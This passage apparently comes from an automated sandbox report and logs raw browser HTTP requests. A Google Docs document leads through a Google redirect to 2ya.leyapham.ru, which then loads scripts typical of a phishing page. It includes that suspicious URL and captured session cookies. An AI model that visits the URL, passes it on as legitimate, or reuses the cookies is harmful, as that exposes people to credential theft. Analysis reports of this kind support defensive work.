"Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: COMPASS=documents=CmIACWuJVwQjbbgamaDQUN300ya3f85M_cX3on2RDnEWpZrbsdwti1Nxw8p4ThwMMFAAbSbJmKNrZHfJt2tVeY15X0_ju6rnfA0pAImaiMJA6oEo801W1O8PwBq7cTiNPPNMABDej6G-BhpzAAlriVdhEXGhD9BVeeKtadw254-mmy_YhS-STy_jzxkciZPcpHXT6giBUJF75-BkUKZ4rd67B14LmZ2cD37gs38z_PaEswVO44-w4XH7jXJbzvDNwxSZ-rPX5m1AFm9l30wO0OukEPtquXhGPFrq_VlzDw==; lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_1 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/566411678-client_js_prod_datetimeresources.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_1 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /document/manifest.json HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /url?q=https://2ya.leyapham.ru/zdvftqs/&sa=D&source=docs&ust=1741178860062685&usg=AOvVaw0m1sYpk_bTclst7lglGFek HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /zdvftqs/ HTTP/1.1Host: 2ya.leyapham.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/3549632437-client_js_prod_voice.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ya.leyapham.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ya.leyapham.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ya.leyapham.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2ya.leyapham.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2ya.leyapham.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=cJIwV7pCJzVvNjHaAhMETsTB6E3o0QjbHBRYjShb8JQ-1741175276-1.0.1.1-wQm8LuOhK67a_c9x26p6BIU6NFRtB0T9AThxdNhvlSypMwk91vRYVL5MXYav4P05ZIUO1U58BLTRwm_zFaomf8QaklAgrG3SyDdFisC8Gzo
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/300033082-client_js_prod_kix_approvals.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/3911495566-client_js_prod_peoplehovercard.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: 